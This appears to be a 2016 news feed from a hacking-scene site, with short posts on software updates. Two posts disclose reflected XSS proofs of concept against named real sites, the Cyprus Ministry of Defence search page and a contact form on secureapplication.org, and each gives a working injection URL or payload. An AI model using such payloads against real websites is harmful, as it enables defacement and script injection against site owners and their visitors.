Ministry of Defence Republic of Cyprus - XSS

Vulnerable page: http://www.mod.gov.cy/mod/mod.nsf/AdvancedSearch_en/AdvancedSearch_en?OpenForm

PoC
http://www.mod.gov.cy/mod/mod.nsf/AdvancedSearch_en/AdvancedSearch_en?OpenForm&q=&p=1&w=&t=&s="><img%20src=http://www.te-home.net/gallery/xssd_by_teamelite.png>


It is enough to insert any XSS code directly into search form and your code will be executed and displayed immediately.

Note: This is a proof of concept and it doesn't reflect the views or interests of above website.
Posted by Neo on 2016-08-23 21:330 comments2 likes

Secure Application - XSS

Vulnerable page: http://www.secureapplication.org/contact-us.php

PoC
"><img src=http://www.te-home.net/gallery/xssd_by_teamelite.png>


It is enough to insert any XSS code directly into contact form fields and your code will be executed and displayed immediately.

Note: This is a proof of concept and it doesn't reflect the views or interests of above website.
Posted by Neo on 2016-08-22 22:410 comments2 likes

Blacklist 1.2.1.0

Changes in 1.2.1.0
Fixed incorrect action status when adding new list
Fixed missing translation parameter in loading disabled list message
Added "listex" command to disable or enable list exception usage
Added "except_proxy" configuration to set public proxy detection exception usage
Added "except_mylist" configuration to set my list item detection exception usage

File information: Blacklist 1.2.1.0
Posted by vhpython on 2016-06-14 00:390 comments8 likes

AdvOR 0.3.0.24

Another GeoIP update.

Changes in 0.3.0.24
- geoip_c.h was updated with GeoIPCountryWhois.csv released on June 7'th; there are 123310 IP ranges having 94 ranges in the fake "A1" country; 91 ranges were approximated to real countries

File information: AdvOR 0.3.0.24
Posted by advor on 2016-06-12 13:310 comments9 likes

Another NMDC exploit fix: ApexDC++ 1.6.2


Finally, after a couple of years, ApexDC++ developers have fixed the NMDC search exploit that I was speaking about earlier. Everyone should update to latest version 1.6.2. Now I also can say that only StrongDC++ is left of all the popular clients. good
Posted by RoLex on 2016-05-28 19:010 comments8 likes
« Back • 1 • Next »